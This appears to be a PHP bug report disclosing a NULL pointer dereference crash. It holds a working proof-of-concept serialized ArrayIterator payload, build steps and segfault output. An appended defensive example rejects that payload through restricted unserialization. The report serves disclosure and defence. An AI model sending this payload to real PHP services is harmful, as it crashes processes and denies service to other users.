
The unserialize function with ArrayIterator leads to NULL pointer dereference when object cloned #22049

@012git012

Description

Version: PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)
Researcher: Igor Sak-Sakovskiy (Positive Technologies)

Listing 1. Language assembly and compilation.

$ git clone https://github.com/php/php-src.git
$ cd php-src
$ ./buildconf
$ ./configure
$ make -j8
$ ./sapi/cli/php -v
PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)
Copyright © The PHP Group and Contributors
Zend Engine v4.6.0-dev, Copyright © Zend by Perforce
    with Zend OPcache v8.6.0-dev, Copyright ©, by Zend by Perforce

Listing 2. The source code.

<?php
$payload = 'O:13:"ArrayIterator":3:{'
    . 's:1:"0";i:0;'
    . 's:1:"1";a:0:{}'
    . 's:1:"2";a:2:{i:0;i:0;i:1;i:0;}'
    . '}';

$obj = unserialize($payload);  // Successful unserialization
$clone = clone $obj;            // Segmentation fault
?>

Executing this PHP code results in a segmentation fault due to corrupted pointer access, leading to Denial of Service (DoS).
Listing 3.

$ ./php-src/sapi/cli/php poc.php

Deprecated: Creation of dynamic property ArrayIterator::$0 is deprecated in /home/administrator/Temp/poc.php on line 8

Deprecated: Creation of dynamic property ArrayIterator::$1 is deprecated in /home/administrator/Temp/poc.php on line 8
Segmentation fault (core dumped)

A NULL pointer dereference leads to a process crash, causing Denial of Service. In ZTS mode, this can stop all currently served requests in the process.

PHP Version

PHP 8.6.0-dev (cli) (built: May 13 2026 08:43:46) (NTS DEBUG)

Operating System

No response
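Added example, not part of the issue report or of php-src: a defensive pattern for code that must unserialize untrusted input until a fix lands. It reuses the reporter's payload from Listing 2 as test input. With `allowed_classes => false`, `unserialize()` never instantiates `ArrayIterator` (or any other class); the `O:` entry comes back as a `__PHP_Incomplete_Class` instance, so the clone handler that crashes in this report is never reached. The helper names `safe_unserialize` and `is_plain_data` are my own and assumed, not a php-src API.

```php
<?php
// Added example (not the reporter's code): defensive handling of untrusted
// serialized data. The payload is the PoC from this issue, used as input.
$payload = 'O:13:"ArrayIterator":3:{'
    . 's:1:"0";i:0;'
    . 's:1:"1";a:0:{}'
    . 's:1:"2";a:2:{i:0;i:0;i:1;i:0;}'
    . '}';

/**
 * Unserialize untrusted input without instantiating any class.
 * Objects in the payload become __PHP_Incomplete_Class instances, which carry
 * no ArrayIterator internals, so cloning or iterating them cannot hit the
 * NULL pointer dereference described in this issue.
 * 'allowed_classes' exists since PHP 7.0, 'max_depth' since PHP 7.4.
 */
function safe_unserialize(string $data, int $maxDepth = 32): mixed
{
    return unserialize($data, [
        'allowed_classes' => false,   // never instantiate a class from input
        'max_depth'       => $maxDepth, // bound nesting to limit parser work
    ]);
}

/**
 * Accept only scalars, null and arrays of those; reject anything that came
 * back as an object (including __PHP_Incomplete_Class), so callers never
 * clone, iterate or call methods on data of attacker-chosen shape.
 */
function is_plain_data(mixed $value): bool
{
    if (is_array($value)) {
        foreach ($value as $v) {
            if (!is_plain_data($v)) {
                return false;
            }
        }
        return true;
    }
    return $value === null || is_scalar($value);
}

$value = safe_unserialize($payload);

if ($value === false || !is_plain_data($value)) {
    // Log and reject instead of handing the object to application code.
    fwrite(STDERR, "rejected: serialized input contained an object or was invalid\n");
    exit(1);
}

// Only plain data reaches this point; cloning it is safe.
$copy = $value;
```

Running this against the PoC payload prints the rejection message and exits with status 1 instead of crashing the process. Where the application genuinely needs objects from serialized input, pass an explicit whitelist (`'allowed_classes' => [MyDto::class]`) rather than `true`, and prefer a format such as JSON for data that crosses a trust boundary.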
